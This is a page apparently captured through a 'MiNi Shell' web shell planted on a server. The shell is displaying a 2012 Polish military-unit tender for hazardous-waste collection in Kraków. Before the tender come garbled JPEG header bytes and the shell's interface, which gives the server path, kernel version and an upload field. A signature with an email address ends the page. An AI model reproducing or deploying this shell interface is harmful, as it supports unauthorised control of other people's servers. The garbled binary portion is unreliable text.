JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120511/105527-N-2012.html

<p class="kh_header"><b>Kraków: Usługa odbioru i zagospodarowania odpadów niebezpiecznych i innych niż niebezpieczne, zgromadzonych na terenie kompleksów wojskowych oraz odbiór 
i zagospodarowanie odpadów niebezpiecznych i innych niż niebezpieczne pochodzących z urządzeń sozotechnicznych wraz z dokładnym oczyszczaniem urządzeń.</b><br>
<b>Numer ogłoszenia: 105527 - 2012; data zamieszczenia: 11.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 3811 , Rząska, ul. Krakowska 2, 30-901 Kraków, woj. małopolskie, tel. +48 12 4555059; 4555116, faks +48 12 4555059, +48 12 4555103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.35wog.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa odbioru i zagospodarowania odpadów niebezpiecznych i innych niż niebezpieczne, zgromadzonych na terenie kompleksów wojskowych oraz odbiór 
i zagospodarowanie odpadów niebezpiecznych i innych niż niebezpieczne pochodzących z urządzeń sozotechnicznych wraz z dokładnym oczyszczaniem urządzeń..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów niebezpiecznych dla środowiska oraz innych niż niebezpieczne dla środowiska, zgromadzonych na terenie kompleksów wojskowych administrowanych przez Jednostkę Wojskową 3811, jak również odbiór i zagospodarowanie odpadów niebezpiecznych dla środowiska oraz innych niż niebezpieczne dla środowiska pochodzących z urządzeń sozotechnicznych wraz z ich dokładnym oczyszczeniem.
Zamawiający podzielił przedmiot zamówienia na 2 zadania tj.:

1) Zadanie Nr 1 - odbiór odpadów niebezpiecznych i innych niż niebezpieczne pochodzących 
z urządzeń sozotechnicznych (separatory substancji ropopochodnych przy myjniach samochodowych i budynkach warsztatowych oraz separatory tłuszczu przy stołówkach żołnierskich) wraz z dokładnym oczyszczeniem urządzeń oraz zagospodarowaniem odpadów zgodnie z obowiązującymi przepisami ochrony środowiska, z kompleksów wojskowych zlokalizowanych przy ulicy:
        1.	Kraków, ul. Wrocławska 82          
        2.	Kraków, ul. Tyniecka 45               
        3.	Kraków, ul. Ułanów 43                
        4.	Rząska, ul. Krakowska 2     
2) Zadanie Nr 2 - odbiór odpadów niebezpiecznych i innych niż niebezpieczne zgromadzonych na terenie kompleksów wojskowych i ich zagospodarowanie zgodnie z obowiązującymi przepisami ochrony środowiska, z kompleksów wojskowych zlokalizowanych przy ulicy:
       1.	Kraków, ul. Wrocławska 82          
       2.	Kraków, ul. Tyniecka 45               
       3.	Kraków, ul. Ułanów 43  
       4.	Kraków, ul. Skrzatów 2
       5.	Rząska, ul. Krakowska 2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga od wykonawcy wniesienia wadium, którego wysokość ustalono dla każdego z zadań z osobna, w kwocie:
ZADANIE NR 1 - co najmniej 3 100,00 zł brutto (słownie: trzy tysiące sto 00/100);
ZADANIE NR 2 - co najmniej   260,00 zł brutto (słownie: dwieście sześćdziesiąt 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) dla zadania nr 1:
        - kserokopię potwierdzoną za zgodność z oryginałem aktualnej decyzji wydanej przez właściwy organ administracyjny, zatwierdzającej program gospodarki odpadami z uwzględnieniem faktu wytwarzania odpadów na terenach zamkniętych, zgodnie z zapisami ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2010 r., Nr 185, poz. 1243 - tekst jednolity).
2) dla zadania nr 2: 
       - kserokopię potwierdzoną za zgodność z oryginałem aktualnego zezwolenia wydanego przez właściwy organ administracyjny, na odzysk lub unieszkodliwianie odpadów niebezpiecznych i innych niż niebezpieczne (z uwzględnieniem zezwolenia na transport odpadów) zgodnie z ustawą z dnia 27 kwietnia 2001 r. 
o odpadach (Dz. U. z 2010 r., Nr 185, poz. 1243 - tekst jednolity), lub
      -  kserokopię potwierdzoną za zgodność z oryginałem aktualnego zezwolenia wydanego przez właściwy organ administracyjny na transport odpadów oraz kopię obowiązującej umowy z firmą prowadzącą działalność w zakresie odzysku lub unieszkodliwiania odpadów, wraz z kopią pozwolenia na odzysk lub unieszkodliwianie odpadów niebezpiecznych i innych niż niebezpieczne dla firmy, uwzględniającą odpady będące przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu  potwierdzenia,  że  Wykonawca  posiada  niezbędną  do  wykonania  zamówienia wiedzę i doświadczenie, do oferty należy dołączyć następujące dokumenty: 
 - wykaz usług odbioru i zagospodarowania odpadów niebezpiecznych i innych niż niebezpieczne w okresie ostatnich 3 lat na kwotę:
ZADANIE NR 1 - 38 000,00 zł brutto (słownie: trzydzieści osiem tysięcy 00/100);
ZADANIE NR 2 -    3 100,00 zł brutto (słownie: trzy tysiące sto 00/100).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZADANIE NR 1
Wykonawca zapewni we własnym zakresie środki techniczne umożliwiające załadunek i transport odpadu oraz czyszczenie urządzeń, tj.:
- pojazd-cysterna winien być zaopatrzony w zbiornik szlamowy do przewozu odpadów o pojemności najlepiej nie mniejszej niż 10m3,
- zbiornik na wodę czystą wraz z myjką ciśnieniową do czyszczenia ścian separatorów,
- ciśnieniowa pompa ssąca umożliwiająca wyciąganie gęstych szlamów, 
- zestaw węży ssących,
- wskaźnik zamontowany na zbiorniku służący do określenia stopnia wypełnienia zbiornika cysterny.

ZADANIE NR 2
Wykonawca zapewni we własnym zakresie środki techniczne umożliwiające załadunek i transport odpadów, tj:
- samochody wyposażone w kontenery, pojemniki lub beczki szczelnie zamykane (niezbędne w przypadku odpadów niebezpiecznych), tak aby przewożone odpady nie stanowiły zagrożenia ani uciążliwości dla środowiska. Pojazdy powinny być dostosowane do rodzaju, specyfiki i ilości przewidzianych do odbioru odpadów;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZADANIE NR 1
Pracownicy Wykonawcy dokonujący czyszczenia separatorów winni być przeszkoleni w zakresie zapewniającym bezpieczeństwo i higienę pracy w zbiorniku, zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997r., w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz. U. 1997, nr 129, poz. 844 z późn. zm.)

ZADANIE NR 2
Pracownicy Wykonawcy dokonujący odbioru i załadunku odpadów winni być przeszkoleni w zakresie zapewniającym bezpieczeństwo podczas pracy z odpadami, zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997r., w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz.U. 1997, nr 129, poz. 844 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia powyższy warunek udziału 
w postępowaniu jeśli wykaże, że jego sytuacja ekonomiczna i finansowa pozwala na wykonanie zamówienia i będzie posiadał:
- aktualne zaświadczenie właściwego dla Wykonawcy naczelnika Urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
- aktualne zaświadczenie właściwego dla Wykonawcy oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem składania ofert. 
- Aktualną polisę OC w zakresie prowadzonej działalności gospodarczej na kwotę:
ZADANIE NR 1 - 100 000,00 zł brutto (słownie: trzysta tysięcy 00/100);
ZADANIE NR 2 -   10 000,00 zł brutto (słownie: dwadzieścia osiem tysięcy 00/100).
W przypadku gdy Wykonawca składa ofertę na oba zadania Zamawiający uzna kryterium za spełnione, jeżeli posiada on aktualną polisę OC w zakresie prowadzonej działalności gospodarczej na wyższą z kwot.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.35wog.mil.pl/2012.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W budynku nr 1, I piętro, 
pokój nr 125 , w siedzibie Zamawiającego:
Jednostka Wojskowa 3811
ul. Krakowska 2, Rząska
woj. małopolskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2012 godzina 09:30, miejsce: Jednostka Wojskowa 3811
ul. Krakowska 2, Rząska
30-901 Kraków 
Kancelaria jawna, budynek nr 1, pokój nr 25 (parter) w godzinach 8:00 - 10:00  i  13:00 - 15:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 18.06.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> odbiór odpadów niebezpiecznych i innych niż niebezpieczne pochodzących 
z urządzeń sozotechnicznych (separatory substancji ropopochodnych przy myjniach samochodowych i budynkach warsztatowych oraz separatory tłuszczu przy stołówkach żołnierskich) wraz z dokładnym oczyszczeniem urządzeń oraz zagospodarowaniem odpadów zgodnie z obowiązującymi przepisami ochrony środowiska, z kompleksów wojskowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Specyfika wykonywanej usługi obejmuje:
1. Odbiór odpadów z urządzeń sozotechnicznych w okresie trwania umowy, w ilościach, rodzajach, terminach i miejscach wskazanych w Załączniku nr 6. 
2. Odbiór odpadów odbywać się będzie w godzinach 8:00 - 15:00 od poniedziałku do piątku,      
z wyłączeniem świąt i dni ustawowo wolnych od pracy.
3. Każdorazowy wjazd na teren kompleksu wojskowego, celem odbioru odpadu musi być wcześniej uzgodniony telefonicznie z Zamawiającym.  
4. Szczegółowy zakres czynności do wykonania przy separatorach ropopochodnych:
- usunięcie zgromadzonego w urządzeniu odpadu (zaolejonego szlamu i wody) poprzez załadunek na środki własne Wykonawcy;
- wyciągnięcie wkładu koalescencyjnego (gąbkowego) i jego oczyszczenie przez zastosowanie preparatu odtłuszczającego (dyspergent);
- wyciągnięcie sekcji lamelowych i ich oczyszczenie;
- oczyszczenie wodą pod ciśnieniem ścian wewnętrznych i posadzki poszczególnych komór urządzenia;
- zamontowanie wkładu koalescencyjnego (gąbkowego) i sekcji lamelowych 
w urządzeniu;
- napełnienie separatora czystą wodą, aż do przelewu na wylocie;
- uporządkowanie terenu wokół urządzenia po usunięciu odpadu i czyszczeniu;
- sporządzenie dokumentów związanych z odbiorem odpadu (karta przekazania odpadu) oraz czyszczeniem urządzenia (protokół czyszczenia urządzenia);
- wywóz (transport) i zagospodarowanie odpadów zgodnie z obowiązującymi przepisami
5. Szczegółowy zakres czynności do wykonania przy separatorach tłuszczu:
- usunięcie zgromadzonego w urządzeniu odpadu (zawiesiny tłuszczów i olejów) poprzez załadunek na środki własne Wykonawcy;
- oczyszczenie wodą pod ciśnieniem ścian wewnętrznych i posadzki poszczególnych komór urządzenia;
- uporządkowanie terenu wokół urządzenia po usunięciu odpadu i czyszczeniu;
- sporządzenie dokumentów związanych z odbiorem odpadu (karta przekazania odpadu) oraz czyszczeniem urządzenia (protokół czyszczenia urządzenia);
 -wywóz (transport) i zagospodarowanie odpadów zgodnie z obowiązującymi przepisami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> odbiór odpadów niebezpiecznych i innych niż niebezpieczne zgromadzonych na terenie kompleksów wojskowych i ich zagospodarowanie zgodnie z obowiązującymi przepisami ochrony środowiska, z kompleksów wojskowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Specyfika wykonywanej usługi obejmuje:
1. Odbiór odpadów z miejsc ich gromadzenia w okresie trwania umowy, w ilościach, rodzajach, terminach i miejscach wskazanych w Załączniku nr 6a do SIWZ. 
2. Wywóz (transport) i zagospodarowanie odpadów zgodnie z obowiązującymi przepisami w tym zakresie,
3. Pozostawienie miejsca odbioru w należytym porządku, bez pozostawienia resztek odbieranego odpadu,
4. Zabezpieczenie na czas trwania umowy w pojemniki do czasowego gromadzenia odpadów przekazywanych firmie do zagospodarowania, zgodnie z Załącznikiem nr 6a do SIWZ,
5. Odbiór odpadów odbywać się będzie z miejsc ich gromadzenia (zgodnie z Załącznikiem nr 6a do SIWZ), w godzinach 800 - 1500 od poniedziałku do piątku, z wyłączeniem świąt i dni ustawowo wolnych od pracy,
6. Każdorazowy wjazd na teren kompleksu wojskowego, celem odbioru odpadu musi być wcześniej uzgodniony telefonicznie z Zamawiającym,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com